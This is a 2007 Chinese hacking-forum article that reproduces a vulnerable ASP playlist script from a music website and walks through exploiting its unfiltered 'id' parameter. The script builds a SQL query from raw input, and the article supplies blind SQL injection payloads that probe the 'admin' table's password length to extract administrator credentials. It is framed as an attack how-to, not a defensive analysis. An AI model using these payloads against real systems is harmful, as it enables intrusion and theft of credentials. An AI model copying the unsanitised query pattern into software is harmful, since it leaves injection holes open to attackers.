黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[推荐]一段有注射漏洞的asp代码
      ★★★★★

一段有注射漏洞的asp代码

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-8-3 9:38:19
别人丢来一段代码
以下是引用片段:
<!--#include file="../user/conn.asp"-->
<!--#include file="Path.Asp"-->
<ASX version = "3.0">
<%
id1=replace(request("id"),"","")
if id1<>"" then
set rs=server.createobject("adodb.recordset")
id=id1
sql="select * from MusicList where id in (" & id & ")"
rs.open sql,conn,1,3
rs("hits")=rs("hits")+1
rs.update
songpath=rs("song_path")
    If songpath="" or IsNull(songpath) Then
      songpath=1
    End If
    select Case songpath
      Case 1
        song_path=song_path1
      Case 2
        song_path=song_path2
      Case 3
        song_path=song_path3
      Case 4
        song_path=song_path4
      Case 5
        song_path=song_path5
      Case 6
        song_path=song_path6
      Case 7
        song_path=song_path7
    End select
    song_path=song_path&rs("Wma")

while not rs.eof
%>
<entry SKIPIFREF="NO">
<title><%=rs("Musicname")%></title>
<author>www.lgrx.com.cn</author>
<copyright>歌手和唱片公司所有</copyright>
<ref href="<%=song_path%>"/>
<param name="Artist" value="<%=rs("Singer")%>"/>
<param name="Album" value="娱人音乐网 <%=rs("hits")%>人气"/>
<param name="Title" value="<%=rs("Musicname")%>"/>
</ENTRY>
<%
rs.movenext
wend
rs.Close
set rs=nothing
end if
conn.close
set conn=nothing
%>
</ASX>
注意id,基本没过滤放到sql语句里,很简单是么?但是

rs("hits")=rs("hits")+1
rs.update


这样决定了不能union查询,因为union出来的是不可写的.....那么只能经典注射了

id=1) sql and 1 in (1
前后的保证出来的有记录,加上中间加我们自己的sql语句,就可以注射了.这里关键表是admin,字段有 password , username

那么就可以这样了

id=1) and (select top 1 len(password) from admin)=16 and 1 in (1
正常返回,语句为真,那么这个密码估计被md5了

后面的不说了 自己猜吧
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    新云CMS Online.asp页面过滤不严02-26
    对网软网上购物系统的漏洞分析01-09
    测试SQL防注入脚本12-21
    Google Xss又出跨站新漏洞11-06
    一次简单的html injection导致的11-06
    风讯、科讯漏洞利用11-01
    Adobe pdf reader URI利用方式浅10-23
    超星阅览器的最新0DAY10-19
    运用SQL Injection做数据库渗透的09-22
    sa-blog 0day09-22
    HTML注入的一些简单想法09-10
    网站登陆接口的攻与防09-04
    相 关 文 章
    剑走偏锋:IIS漏洞利用
    oblog文件下载漏洞
    sablog 1.6 多个跨站漏洞
    最新SMSJ Version 8.0漏洞
    风讯最新多处SQL注入漏洞!
    yxbbs漏洞检测
    ShopEx PHP远程包含漏洞
    CreateLive CMS Version 4.0 0day漏洞利
    最新Oblog4.6注入漏洞分析之二
    Oblog注入漏洞分析
    凡人网络购物系统 V8.0 简体中文版 Coo
    黑色技术<Spider 1.0> 爬行蜘蛛漏洞扫描
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886